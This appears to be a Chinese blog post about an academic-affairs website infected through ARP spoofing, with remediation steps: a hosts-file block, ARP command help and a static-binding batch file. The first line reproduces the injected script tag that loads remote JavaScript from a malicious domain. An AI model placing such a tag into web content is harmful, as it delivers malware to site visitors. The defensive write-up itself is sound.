<script src=http://al.99.vc/1.js></script>
最近教务处网站总是不定期出现植入这段代码的病毒,有时重启后会解决问题,有时重启后会提示IP地址冲突。
经查,应该是中了ARP中的“木马下载者”,结合ARP防火墙、windows清理助手和安全卫士以及瑞星最新版,应该可以搞定。已经通知负责老师更新杀毒软件了做处理了
暂时的解决方案:
修改系统盘C:\WINDOWS\system32\drivers\etc下host(用记事本打开)添加127.0.0.1 al.99.vc来屏蔽网站
ARP的详细命令如下:
arp /?
Displays and modifies the IP-to-Physical address translation tables used by
address resolution protocol (ARP).
ARP -s inet_addr eth_addr [if_addr]
ARP -d inet_addr [if_addr]
ARP -a [inet_addr] [-N if_addr]
-a Displays current ARP entries by interrogating the current
protocol data. If inet_addr is specified, the IP and Physical
addresses for only the specified computer are displayed. If
more than one network interface uses ARP, entries for each ARP
table are displayed.
-g Same as -a.
inet_addr Specifies an internet address.
-N if_addr Displays the ARP entries for the network interface specified
by if_addr.
-d Deletes the host specified by inet_addr. inet_addr may be
wildcarded with * to delete all hosts.
-s Adds the host and associates the Internet address inet_addr
with the Physical address eth_addr. The Physical address is
given as 6 hexadecimal bytes separated by hyphens. The entry
is permanent.
eth_addr Specifies a physical address.
if_addr If present, this specifies the Internet address of the
interface whose address translation table should be modified.
If not present, the first applicable interface will be used.
Example:
> arp -s 157.55.85.212 00-aa-00-62-c6-09 .... Adds a static entry.
> arp -a .... Displays the arp table.
其中arp -a是用来查看的,我查了一下,确实显示当前ip绑定的是上级的路由器地址,如果这时显示全是0的话,就肯定出问题了。需要用arp -d来消除一下,然后再重新绑定正确的。
可以用ARP -S做一下绑定,不过重启后,可能就失效了。所以,需要建立一个批处理,放启动里:
@echo off
arp -d
arp -s 网关IP 网关MAC
协助维护网站时,系统里的内容过多庞杂,又不方便重新安装与设定,只能做一些简单的维护、协助与指导性工作,看起来不是很有效,有时真地很郁闷。
